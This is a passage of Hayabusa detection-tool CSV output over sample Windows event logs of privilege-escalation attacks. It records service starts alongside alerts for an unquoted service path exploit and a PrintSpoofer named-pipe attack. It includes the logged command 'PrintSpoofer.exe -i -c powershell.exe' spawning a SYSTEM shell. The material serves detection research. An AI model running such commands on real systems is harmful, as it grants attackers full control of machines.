+09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2632 | PGUID: 747F3D96-B766-5EA4-0000-0010A4790100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k utcsvc -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2640 | PGUID: 747F3D96-B766-5EA4-0000-0010067A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2704 | PGUID: 747F3D96-B766-5EA4-0000-0010DE7E0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2736 | PGUID: 747F3D96-B766-5EA4-0000-0010A7800100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2772 | PGUID: 747F3D96-B766-5EA4-0000-001074830100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2848 | PGUID: 747F3D96-B766-5EA4-0000-0010D4880100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - Potential Unquoted Service Exploit | Cmd: c:\Program Files\vulnsvc\mmm.exe | Process: C:\program.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2856 | PGUID: 747F3D96-B766-5EA4-0000-0010E7880100 | Hash: SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,medium,Evas,Renamed Binary,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2876 | PGUID: 747F3D96-B766-5EA4-0000-0010038A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2900 | PGUID: 747F3D96-B766-5EA4-0000-00104A8D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3044 | PGUID: 747F3D96-B766-5EA4-0000-0010BAA10100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: sihost.exe | Process: C:\Windows\System32\sihost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | LID: 0x1d39b | PID: 3752 | PGUID: 747F3D96-B767-5EA4-0000-0010FE2E0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3760 | PGUID: 747F3D96-B767-5EA4-0000-0010D0310200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3820 | PGUID: 747F3D96-B767-5EA4-0000-001097430200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4264 | PGUID: 747F3D96-B768-5EA4-0000-00106FAE0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: winlogon.exe | LID: 0x1d39b | PID: 4536 | PGUID: 747F3D96-B769-5EA4-0000-00101D9C0300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x1d39b | PID: 4600 | PGUID: 747F3D96-B76A-5EA4-0000-0010EEB50300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\Temp | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCache | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetHistory | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCookies | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc | LID: 0x1d39b | PID: 5840 | PGUID: 747F3D96-B76F-5EA4-0000-0010624D0600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6964 | PGUID: 747F3D96-B776-5EA4-0000-0010A74D0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x1d39b | PID: 7000 | PGUID: 747F3D96-B776-5EA4-0000-001006590B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 6656 | PGUID: 747F3D96-B79B-5EA4-0000-00105BD50F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 318 0000021FF2606500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6648 | PGUID: 747F3D96-B79B-5EA4-0000-001075DA0F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 748 | PGUID: 747F3D96-B79B-5EA4-0000-001001FC0F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Discovery - domain time | Cmd: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 | Process: C:\BGinfo\BGINFO.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 7056 | PGUID: 747F3D96-B7A0-5EA4-0000-001026D11000 | Hash: SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\SecurityHealthService.exe | Process: C:\Windows\System32\SecurityHealthService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 7088 | PGUID: 747F3D96-B7A0-5EA4-0000-001027D81000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x1d39b | PID: 3376 | PGUID: 747F3D96-B7A0-5EA4-0000-00108D131100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 864 | PGUID: 747F3D96-B7A2-5EA4-0000-0010982F1200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 3256 | PGUID: 747F3D96-B7A5-5EA4-0000-0010CAB51300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 258 0000021FF266EC20 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7036 | PGUID: 747F3D96-B7A5-5EA4-0000-0010EAB91300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 4480 | PGUID: 747F3D96-B7AA-5EA4-0000-001066001700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2792 | PGUID: 747F3D96-B7D4-5EA4-0000-0010E09B1700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 6548 | PGUID: 747F3D96-B7DE-5EA4-0000-0010FA4E1800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 992 | PGUID: 747F3D96-B7DF-5EA4-0000-001052671800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1396 | PGUID: 747F3D96-B7DF-5EA4-0000-001080711800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 2020-05-03 03:01:52.553 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 7212 | PGUID: 747F3D96-B49D-5EAD-0000-001029FEBE00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PrintSpoofer.exe -i -c powershell.exe | Process: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x812b1 | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\spoolss | Process: c:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe | PID: 6760 | PGUID: 747F3D96-B592-5EAD-0000-0010ECCBC200,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,Possible PrivEsc attempt - Rogue Spoolss Named Pipe | Pipe: \9023de59-e026-4da5-97dd-913597cd038f\pipe\spoolss | Process: System | PID: 4 | PGUID: 747F3D96-6AB8-5EAD-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,Evas | PrivEsc,EfsPotato Named Pipe,,../hayabusa-rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: powershell.exe | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PrintSpoofer.exe -i -c powershell.exe | LID: 0x3e7 | PID: 1428 | PGUID: 747F3D96-B592-5EAD-0000-0010D4CDC200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe | LID: 0x3e7 | PID: 6004 | PGUID: 747F3D96-B595-5EAD-0000-00106BFDC200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx 2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 